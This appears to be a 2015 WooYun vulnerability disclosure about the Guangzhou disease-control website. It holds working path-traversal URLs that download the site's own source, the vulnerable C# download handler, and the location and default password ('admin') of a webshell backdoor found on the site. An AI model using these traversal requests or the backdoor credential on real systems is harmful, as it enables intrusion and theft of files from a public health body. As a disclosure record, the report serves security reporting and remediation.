当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113887

漏洞标题:广州市疾病预防控制中心任意文件下载以及存在shell后门

相关厂商:广州市疾病预防控制中心

漏洞作者: 随页清风

提交时间:2015-05-13 16:30

修复时间:2015-06-28 11:58

公开时间:2015-06-28 11:58

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-13: 细节已通知厂商并且等待厂商处理中
2015-05-14: 厂商已经确认,细节仅向厂商公开
2015-05-24: 细节向核心白帽子及相关领域专家公开
2015-06-03: 细节向普通白帽子公开
2015-06-13: 细节向实习白帽子公开
2015-06-28: 细节向公众公开

简要描述:

广州市疾病预防控制中心任意文件下载以及存在shell后门
各种马场啊

详细说明:

http://2015.gzcdc.org.cn/news/downtxt.aspx?filename=../../news/downtxt.aspx


http://2015.gzcdc.org.cn/news/downtxt.aspx?filename=../../news/downtxt.aspx.cs


using System;
using System.Data;
using System.Configuration;
using System.Collections;
using System.Web;
using System.Web.Security;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Web.UI.WebControls.WebParts;
using System.Web.UI.HtmlControls;
using System.IO;
using Model;
using Utility;
using BLL;
using Components;
public partial class news_downtxt : System.Web.UI.Page
{
protected void Page_Load(object sender, EventArgs e)
{
if (!Page.IsPostBack)
{
Download();
}
}
public void Download()
{
string FileName = Request.QueryString["filename"].ToString();
string destFileName = Server.MapPath("/upload/news/") + FileName;
destFileName = Server.UrlDecode(destFileName);
if (File.Exists(destFileName))
{
Response.AppendHeader("Content-Disposition", "attachment;filename=" + HttpUtility.UrlEncode(Path.GetFileName(destFileName), System.Text.Encoding.UTF8));
Response.ContentType = "application/octet-stream";
Response.WriteFile(destFileName);
Response.Flush();
Response.End();
}
else
{
Jscript.AlertAndRedirect("找不到相关文件", "/news/");
}
}
}


未对文件名进行任何过滤,导致任意文件下载

漏洞证明:

http://2015.gzcdc.org.cn/index1.aspx


后门地址,默认密码admin 里面还有很多马儿

修复方案:

删除,修复漏洞。估计是以前的注入漏洞造成的

版权声明:转载请注明来源 随页清风@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-05-14 11:56

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:10
正在联系相关网站管理单位处置。

最新状态:

暂无